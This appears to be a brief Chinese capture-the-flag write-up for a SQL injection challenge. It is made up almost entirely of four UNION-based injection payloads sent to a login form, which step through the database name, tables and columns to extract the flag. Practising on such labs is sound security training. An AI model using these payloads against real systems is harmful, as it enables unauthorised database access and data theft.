题目链接:http://123.206.87.240:9001/sql/
数据库
表名
列名
select flag
代码
admin_name=admin" union select database(),database() #&admin_passwd=12345&submit=GO+GO+GO
admin_name=admin" union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),database() #&admin_passwd=12345&submit=GO+GO+GO
admin_name=admin" union select (select group_concat(column_name) from information_schema.columns where table_name = 'flag1'),database() #&admin_passwd=12345&submit=GO+GO+GO
admin_name=admin" union select (select flag1 from flag1),database() #&admin_passwd=12345&submit=GO+GO+GO